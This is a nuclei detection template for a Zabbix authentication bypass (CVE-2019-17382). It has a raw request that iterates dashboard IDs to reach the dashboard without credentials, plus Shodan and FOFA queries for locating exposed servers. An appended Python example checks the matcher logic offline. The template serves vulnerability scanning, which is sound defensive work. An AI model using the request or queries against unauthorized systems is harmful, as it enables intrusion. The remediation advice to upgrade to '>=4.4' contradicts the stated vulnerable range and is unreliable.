id: CVE-2019-17382

info:
  name: Zabbix <=4.4 - Authentication Bypass
  author: harshbothra_
  severity: critical
  description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the Zabbix application.
  remediation: |
    Upgrade to a patched version of Zabbix (>=4.4) to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/47467
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
    - https://lists.debian.org/debian-lts-announce/2023/08/msg00027.html
    - https://github.com/huimzjty/vulwiki
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2019-17382
    cwe-id: CWE-639
    epss-score: 0.3552
    epss-percentile: 0.97136
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 100
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve2019,cve,fuzz,auth-bypass,login,edb,zabbix

http:
  - raw:
      - |
        GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      ids: helpers/wordlists/numbers.txt
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Dashboard</title>"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b100ab9974bd16719860f013afc3fe8a9b09da541e2df13756dc7ac620cd480f02210080d1fc3247458331b51cf1b884db94afe5b40f5dd4258b168a7569927a66ef62:922c64590222798bb761d5b6d8e72950
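As an added illustration (not part of this template or of the nuclei project), the Python below evaluates the template's two matchers under its `and` condition on constructed responses, so the difference between a 200 login page and an unauthenticated dashboard is visible without touching a live host. The matcher definitions are copied from the template; the function names, `Response` class and sample responses are my own assumptions.

```python
"""Offline evaluation of the template's matcher logic (added example)."""
from dataclasses import dataclass
from typing import Dict, Optional

# Matchers copied from the template's http section.
MATCHERS = [
    {"type": "word", "words": ["<title>Dashboard</title>"]},
    {"type": "status", "status": [200]},
]
MATCHERS_CONDITION = "and"  # template's matchers-condition


@dataclass
class Response:
    """Minimal stand-in for an HTTP response (constructed, not captured)."""
    status: int
    body: str


def matcher_hits(matcher: dict, resp: Response) -> bool:
    """Return True if a single nuclei-style matcher fires on the response."""
    if matcher["type"] == "word":
        # A word matcher fires if any listed word appears in the body.
        return any(w in resp.body for w in matcher["words"])
    if matcher["type"] == "status":
        return resp.status in matcher["status"]
    raise ValueError(f"unsupported matcher type: {matcher['type']}")


def template_matches(resp: Response, condition: str = MATCHERS_CONDITION) -> bool:
    """Combine every matcher with the template's matchers-condition."""
    results = [matcher_hits(m, resp) for m in MATCHERS]
    return all(results) if condition == "and" else any(results)


def first_matching_id(responses: Dict[int, Response]) -> Optional[int]:
    """Emulate stop-at-first-match over the {{ids}} payload: the first
    dashboardid whose response satisfies the matchers, or None."""
    for dashboard_id, resp in sorted(responses.items()):
        if template_matches(resp):
            return dashboard_id
    return None


# Constructed sample responses for three dashboardid values.
SAMPLES = {
    1: Response(302, ""),                                  # redirect to login: patched host
    2: Response(200, "<html><title>Zabbix</title>login"),  # 200 but login page: no match
    3: Response(200, "<html><title>Dashboard</title>"),    # dashboard served: match
}

if __name__ == "__main__":
    print(first_matching_id(SAMPLES))  # -> 3
```

A 200 alone is not enough for a finding: the status matcher and the title matcher must both hold, which is why the login page at id 2 is rejected.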